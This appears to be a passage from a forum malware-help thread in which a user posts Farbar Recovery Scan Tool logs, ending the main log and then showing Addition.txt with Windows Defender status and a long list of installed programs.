2014-09-19 17:20 - 2014-02-21 16:08 - 00000000 ____D () C:\ProgramData\Skype

Some content of TEMP:
====================
C:\Users\Rod\AppData\Local\Temp\917b0b87-3358-4e79-93de-3dfc2fc99ed0.exe
C:\Users\Rod\AppData\Local\Temp\Execute2App.exe
C:\Users\Rod\AppData\Local\Temp\ICReinstall_FileZilla_3.8.1_win32-setup.exe
C:\Users\Rod\AppData\Local\Temp\ICReinstall_FirefoxSetup.exe
C:\Users\Rod\AppData\Local\Temp\msvcp90.dll
C:\Users\Rod\AppData\Local\Temp\msvcr90.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 00:33

==================== End Of Log ============================

 

Here's the data from Addition.txt:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by Rod at 2014-10-17 15:15:18
Running from E:\Documents
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.34309 - BitTorrent Inc.)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.10 - Adobe Systems)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{A922C4B7-50E0-4787-A94C-59DBF3C65DBE}) (Version: 3.0 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FE86CB0C-FCB3-4358-B4B0-B0A41E33B3DD}) (Version: 7.1.0.32 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cisco WebEx Meetings (HKCU\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{75B8A55E-0762-4676-AAC0-6FDF025B034B}) (Version: 1.0.220 - Citrix)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
FileZilla Client 3.8.1 (HKLM-x32\...\FileZilla Client) (Version: 3.8.1 - Tim Kosse)
Firefox Packages (HKCU\...\Firefox Packages) (Version:  - ) <==== ATTENTION
Google Apps Migration For Microsoft Outlook® 3.0.19.44 (HKLM-x32\...\{16CA4BD4-27ED-4DA0-9190-48F69D8AAC25}) (Version: 3.0.19.44 - Google, Inc.)
Google Apps Sync™ for Microsoft Outlook® 3.5.380.1010 (HKLM-x32\...\{DE0A6BFF-9531-4681-BCDD-884B84AB2F89}) (Version: 3.5.380.1010 - Google, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Drive (HKLM-x32\...\{C6640705-7479-4EE5-BC86-879F05F65E74}) (Version: 1.17.7290.4094 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
iTunes (HKLM\...\{0D924CB2-2EA4-4044-BAF7-770202D6BD0D}) (Version: 11.1.4.62 - Apple Inc.)
join.me (HKCU\...\JoinMe) (Version: 1.14.0.132 - LogMeIn, Inc.)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version:  - LastPass)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Business 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft OneDrive (HKCU\...\OneDriveSetup.exe) (Version: 17.0.4035.0328 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package - SE (x64) (HKLM\...\Microsoft Visual J# 2.0 Redistributable Package - SE (x64)) (Version:  - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package - SE (x64) (Version: 2.0.50728 - Microsoft Corporation) Hidden
mIRC (HKLM-x32\...\mIRC) (Version: 7.32 - mIRC Co. Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyFreeCodec (HKCU\...\MyFreeCodec) (Version:  - )
NVIDIA 3D Vision Driver 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation)
NVIDIA Control Panel 331.65 (Version: 331.65 - NVIDIA Corporation) Hidden
NVIDIA Graphics Driver 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.26.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.26.4 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.133.889 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.13.3165 - NVIDIA Corporation) Hidden
NVIDIA Update 1.15.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.15.2 - NVIDIA Corporation)
NVIDIA Update Components (Version: 1.15.2 - NVIDIA Corporation) Hidden
Plex Media Server (HKLM-x32\...\{9eb61479-6f2f-43c4-bfe8-12a7ea9d1acb}) (Version: 0.9.914 - Plex, Inc.)
Plex Media Server (x32 Version: 0.9.914 - Plex, Inc.) Hidden
PowerISO (HKLM-x32\...\PowerISO) (Version: 4.7 - PowerISO Computing, Inc.)
PS3 Media Server (HKLM-x32\...\PS3 Media Server) (Version: 1.90.1 - PS3 Media Server)
Quicken 2012 (HKLM-x32\...\{0A1E0BDA-5E8F-436d-8BE5-7E97C5CB899D}) (Version: 21.1.7.18 - Intuit)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{17528CE4-C333-48FB-A9E4-D841E795CDCE}) (Version: 3.0.23.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 3.0.23.0 - Renesas Electronics Corporation) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.2.14014_7 - Samsung Electronics Co., Ltd.)
Samsung Kies (x32 Version: 2.6.2.14014_7 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.14072.12 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.14072.12 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.45.0 - SAMSUNG Electronics Co., Ltd.)
ScanSnap (x32 Version: 5.1.30.19 - PFU Limited) Hidden
ScanSnap (x32 Version: 5.1.62.2 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V5.1L62 - PFU)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version:  - Microsoft) Hidden
SharePort Plus (HKLM\...\SharePort Plus) (Version: 4.3.0 - D-Link Corporation)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Snagit 9.1 (HKLM-x32\...\{0E6ED660-498C-42F7-9EF4-FB0C96DFC01A}) (Version: 9.1.0.206 - TechSmith Corporation)
Sonos Controller (HKLM-x32\...\{7BBA9BF8-05DF-47D8-8880-82A9B99505B9}) (Version: 27.2.81200 - Sonos, Inc.)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.28223 - TeamViewer)
TextPad 4.7 (HKLM-x32\...\{B510A987-487E-4C66-9F4F-D386AC275715}) (Version: 4.7.2 - Helios)
TotalExcelConverter (HKLM-x32\...\Total Excel Converter_is1) (Version: 3.5 - Softplicity, Inc.)
TotalHTMLConverter (HKLM-x32\...\Total HTML Converter_is1) (Version: 2.5 - Softplicity, Inc.)
TotalMovieConverter (HKLM-x32\...\Total Movie Converter_is1) (Version:  - Softplicity, Inc.)
TotalOutlookConverter (HKLM-x32\...\Total Outlook Converter_is1) (Version: 2.1 - Softplicity, Inc.)
TotalOutlookConverterPro (HKLM-x32\...\Total Outlook Converter Pro_is1) (Version:  - Softplicity, Inc.)
True Image 2013 (HKLM-x32\...\{ADAEEC53-24AF-4A49-B872-75FCBDA59916}Visible) (Version: 16.0.5551 - Acronis)
True Image 2013 (x32 Version: 16.0.5551 - Acronis) Hidden
True Image 2013 Plus Pack (HKLM-x32\...\{516200E0-2043-4603-B9E7-CD87B71B6DF4}) (Version: 16.0.5551 - Acronis)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{39767ECA-1731-45DB-AB5B-6BF40E151D66}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BA610006-2C39-4419-9834-CF61AB24810A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
